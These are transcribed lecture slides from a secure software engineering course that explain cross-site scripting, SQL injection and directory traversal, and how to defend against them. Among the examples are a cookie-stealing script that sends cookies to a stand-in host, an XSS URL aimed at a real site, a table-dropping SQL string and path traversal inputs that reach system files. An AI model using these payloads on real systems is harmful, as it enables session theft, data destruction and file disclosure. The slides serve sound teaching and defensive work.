Secure Software Engineering: Input Vulnerabilities CPSC 410.
-
Upload
jesse-moore -
Category
Documents
-
view
213 -
download
0
Transcript of Secure Software Engineering: Input Vulnerabilities CPSC 410.
![Page 1: Secure Software Engineering: Input Vulnerabilities CPSC 410.](https://reader030.fdocuments.in/reader030/viewer/2022032802/56649e0c5503460f94af4af6/html5/thumbnails/1.jpg)
Secure Software Engineering: Input Vulnerabilities
CPSC 410
![Page 2: Secure Software Engineering: Input Vulnerabilities CPSC 410.](https://reader030.fdocuments.in/reader030/viewer/2022032802/56649e0c5503460f94af4af6/html5/thumbnails/2.jpg)
Input Vulnerabilities
• We all know not to run “code” retrieved from suspicious places
• But passive “data” may beinterpreted as malicious instructions
System.out.println(“/etc/password”);vs.
File file = new File(“/etc/password”);
![Page 3: Secure Software Engineering: Input Vulnerabilities CPSC 410.](https://reader030.fdocuments.in/reader030/viewer/2022032802/56649e0c5503460f94af4af6/html5/thumbnails/3.jpg)
3 Most Common Input Vulnerabilities on Web
1. Cross-site Scripting
2. SQL Injection
3. Directory Traversal
See http://www.owasp.com - the Open Web App Security Project
![Page 4: Secure Software Engineering: Input Vulnerabilities CPSC 410.](https://reader030.fdocuments.in/reader030/viewer/2022032802/56649e0c5503460f94af4af6/html5/thumbnails/4.jpg)
Cross Site Scripting• Web browsers should only execute JavaScript
from sites that you visit• But … Web sites often echo values given as input,
e.g.Input: http://www.foo.com?username=‘Eric’Output page: Hello Eric• If we put JavaScript into an input, an output page
could include that JavaScript!• The tester must assume every data entry point is
a possible XSS hole.
![Page 5: Secure Software Engineering: Input Vulnerabilities CPSC 410.](https://reader030.fdocuments.in/reader030/viewer/2022032802/56649e0c5503460f94af4af6/html5/thumbnails/5.jpg)
Example: Invectus on Macdonald’s http://www.mcdonalds.com/content/us/en/search/search_results.html?queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
http://www.mcdonalds.com/content/us/en/search/search_results.html?
queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E
queryText=”><img src=”http://i55.tinypic.com/witu7d.png” height=”650″ width=”1000″>
Source:http://www.acunetix.com/blog/news/full-disclosure-high-profile-websites-xss/
![Page 6: Secure Software Engineering: Input Vulnerabilities CPSC 410.](https://reader030.fdocuments.in/reader030/viewer/2022032802/56649e0c5503460f94af4af6/html5/thumbnails/6.jpg)
![Page 7: Secure Software Engineering: Input Vulnerabilities CPSC 410.](https://reader030.fdocuments.in/reader030/viewer/2022032802/56649e0c5503460f94af4af6/html5/thumbnails/7.jpg)
Malicious Script Input
• Basic example (assume URL encoding)
http://www.foo.com?username=<script>alert(“Hello World”)</script>
• Steal user’s cookies
<script type='text/javascript'>var img = document.createElement('img'); img.setAttribute('src', ‘http://localhost:8080?cook=' + escape(document.cookie)); document.body.appendChild(img);
</script>
![Page 8: Secure Software Engineering: Input Vulnerabilities CPSC 410.](https://reader030.fdocuments.in/reader030/viewer/2022032802/56649e0c5503460f94af4af6/html5/thumbnails/8.jpg)
GWT vulnerabilities
• JavaScript on your host page that is unrelated to GWT
• Code you write that sets innerHTML on GWT Widget objects
• Using the JSON API to parse untrusted strings (which ultimately calls JavaScript's eval function)
• JavaScript Native Interface (JSNI) code that you write that does something unsafe (such as setting innerHTML, calling eval, writing directly to the document via document.write, etc.)
Src: https://developers.google.com/web-toolkit/articles/security_for_gwt_applications#xss
![Page 9: Secure Software Engineering: Input Vulnerabilities CPSC 410.](https://reader030.fdocuments.in/reader030/viewer/2022032802/56649e0c5503460f94af4af6/html5/thumbnails/9.jpg)
InnerHTML example<html><head> <script language="JavaScript"> function fillMyDiv(newContent) { document.getElementById('mydiv').innerHTML = newContent; } </script></head><body> <p>Some text before mydiv.</p> <div id="mydiv"></div> <p>Some text after mydiv.</p></body></html>
![Page 10: Secure Software Engineering: Input Vulnerabilities CPSC 410.](https://reader030.fdocuments.in/reader030/viewer/2022032802/56649e0c5503460f94af4af6/html5/thumbnails/10.jpg)
GWT Guidelines
• Carefully inspect and strip or escape any strings you assign to innerHTML using GWT code
• Carefully inspect any JavaScript strings you pass to GWT's JSON parser
• Carefully inspect any strings you pass to eval or assign to innerHTML via a JSNI method
• Take care in your native JSNI methods to not do anything that would expose you to attacks
![Page 11: Secure Software Engineering: Input Vulnerabilities CPSC 410.](https://reader030.fdocuments.in/reader030/viewer/2022032802/56649e0c5503460f94af4af6/html5/thumbnails/11.jpg)
Best Solution
• Filter any data which is echo’d back to HTML• e.g.
– http://josephoconnell.com/java/xss-html-filter/
String input = request.getParameter(“data”);String clean = new HTMLInputFilter().filter( input );
![Page 12: Secure Software Engineering: Input Vulnerabilities CPSC 410.](https://reader030.fdocuments.in/reader030/viewer/2022032802/56649e0c5503460f94af4af6/html5/thumbnails/12.jpg)
Simple Web App
• A Web form that allows the user to look up account details• Underneath – a Java Web application serving the requests
![Page 13: Secure Software Engineering: Input Vulnerabilities CPSC 410.](https://reader030.fdocuments.in/reader030/viewer/2022032802/56649e0c5503460f94af4af6/html5/thumbnails/13.jpg)
SQL Injection Example• Happy-go-lucky SQL statement:
• Leads to SQL injection– One of the most common Web application vulnerabilities caused
by lack of input validation• But how?
– Typical way to construct a SQL query using string concatenation– Looks benign on the surface – But let’s play with it a bit more…
String query = “SELECT Username, UserID, Password
FROM Users WHERE username =“ + user
+ “ AND password =“ +
password;
![Page 14: Secure Software Engineering: Input Vulnerabilities CPSC 410.](https://reader030.fdocuments.in/reader030/viewer/2022032802/56649e0c5503460f94af4af6/html5/thumbnails/14.jpg)
Injecting Malicious Data (1)
query = “SELECT Username,
UserID, Password
FROM Users WHERE
Username = 'bob'
AND Password = ‘********‘”
Press “Submit”
![Page 15: Secure Software Engineering: Input Vulnerabilities CPSC 410.](https://reader030.fdocuments.in/reader030/viewer/2022032802/56649e0c5503460f94af4af6/html5/thumbnails/15.jpg)
Injecting Malicious Data (2)
query = “SELECT Username,
UserID, Password
FROM Users WHERE
Username = 'bob’--
’ AND Password = ‘‘”
Press “Submit”
![Page 16: Secure Software Engineering: Input Vulnerabilities CPSC 410.](https://reader030.fdocuments.in/reader030/viewer/2022032802/56649e0c5503460f94af4af6/html5/thumbnails/16.jpg)
Injecting Malicious Data (3)
query = “SELECT Username,
UserID, Password
FROM Users WHERE
Username = 'bob’; DROP Users--
’ AND Password = ‘‘”
Press “Submit”
![Page 17: Secure Software Engineering: Input Vulnerabilities CPSC 410.](https://reader030.fdocuments.in/reader030/viewer/2022032802/56649e0c5503460f94af4af6/html5/thumbnails/17.jpg)
Heart of the Issue: Tainted Input Data
Web Apphacker
browser
applicationevil
input
database
output
input evil
Insert input checking!
cross-site scripting
SQL injections
![Page 18: Secure Software Engineering: Input Vulnerabilities CPSC 410.](https://reader030.fdocuments.in/reader030/viewer/2022032802/56649e0c5503460f94af4af6/html5/thumbnails/18.jpg)
Bobby Tables
http://xkcd.com/327/
![Page 19: Secure Software Engineering: Input Vulnerabilities CPSC 410.](https://reader030.fdocuments.in/reader030/viewer/2022032802/56649e0c5503460f94af4af6/html5/thumbnails/19.jpg)
Mitigating SQL Injection• Always use Prepared Statements or Stored Procedures
– Instead of:stmt.execute(
"UPDATE EMPLOYEES SET SALARY = “+input1+“ WHERE ID = “ + input2);
– Use:PreparedStatement pstmt = conn.prepareStatement(
"UPDATE EMPLOYEES SET SALARY = ? WHERE ID = ?“); pstmt.setBigDecimal(1, input1) pstmt.setInt(2, input2)
• The account used to make the database connection must have “Least privilege.” If the application only requires read access then the account must be given read access only.
• Avoid disclosing error information: Weak error handling is a great way for an attacker to profile SQL injection attacks.
![Page 20: Secure Software Engineering: Input Vulnerabilities CPSC 410.](https://reader030.fdocuments.in/reader030/viewer/2022032802/56649e0c5503460f94af4af6/html5/thumbnails/20.jpg)
‘SQL’ injection on GWT
• More a vulnerability of the RPC services– Could send arbitrary data to your datastore (once
the Javascript is de-obfuscated)
• Also possible to do JDOQL injection– Use Query object and parameters instead of String
syntaxQuery query = pm.newQuery(Employee.class);query.setFilter("lastName == lastNameParam");query.setOrdering("hireDate desc");query.declareParameters("String lastNameParam");
…List<Employee> results = (List<Employee>) query.execute("Smith");query.closeAll();
![Page 21: Secure Software Engineering: Input Vulnerabilities CPSC 410.](https://reader030.fdocuments.in/reader030/viewer/2022032802/56649e0c5503460f94af4af6/html5/thumbnails/21.jpg)
Recent Examples
• On March 27, 2011 mysql.com, the official homepage for MySQL, was compromised
• On June 1, 2011, LulzSec steal information from Sony PS3 users
• In August, 2011, Hacker Steals User Records From Nokia Developer Site
![Page 22: Secure Software Engineering: Input Vulnerabilities CPSC 410.](https://reader030.fdocuments.in/reader030/viewer/2022032802/56649e0c5503460f94af4af6/html5/thumbnails/22.jpg)
Directory/Path Traversal• Occurs when user input is used to create the path for
reading a file on disk
http://myblog.com/view?photo=eric.jpg
String file = request.getParameter(“photo”)new File(“/images/” + file);
See https://www.owasp.org/index.php/Path_Traversal
![Page 23: Secure Software Engineering: Input Vulnerabilities CPSC 410.](https://reader030.fdocuments.in/reader030/viewer/2022032802/56649e0c5503460f94af4af6/html5/thumbnails/23.jpg)
Directory TraversalMalicious input:http://myblog.com/view?photo=../../../../../Windows/system.ini
• Has been used to retrieve – “web.xml” files– Apache conf files– UNIX password files
• Other exampleYou let user choose between different style
templates and save the template filename in their profile
![Page 24: Secure Software Engineering: Input Vulnerabilities CPSC 410.](https://reader030.fdocuments.in/reader030/viewer/2022032802/56649e0c5503460f94af4af6/html5/thumbnails/24.jpg)
Example 2• http://some_site.com.br/get-files.jsp?
file=report.pdf • http://some_site.com.br/get-page.php?
home=aaa.html • In these examples it’s possible to insert a
malicious string as the variable parameter to access files located outside the web publish directory.
• http://some_site.com.br/get-files?file=../../../../some dir/some file
• http://some_site.com.br/../../../../some dir/some file
![Page 25: Secure Software Engineering: Input Vulnerabilities CPSC 410.](https://reader030.fdocuments.in/reader030/viewer/2022032802/56649e0c5503460f94af4af6/html5/thumbnails/25.jpg)
Best Solution
• Don’t construct file paths from user input• Understand how your web server handles file
access.• Create a UUID (Universally Unique IDentifier)
for each file and save as a column with datauuid = UUID.randomUUID().toString()
File savedFile = File(uuid);
• Example database table for images
picID picName picDesc picOwner picFormat uuid
![Page 26: Secure Software Engineering: Input Vulnerabilities CPSC 410.](https://reader030.fdocuments.in/reader030/viewer/2022032802/56649e0c5503460f94af4af6/html5/thumbnails/26.jpg)
2 Rules to Remember
1. Always assume many users are malicious and want to break your software
2. Don’t assume a Web site is always accessed through a normal Web Browser
Famous last words, “I wrote the JavaScript so that this would never happen”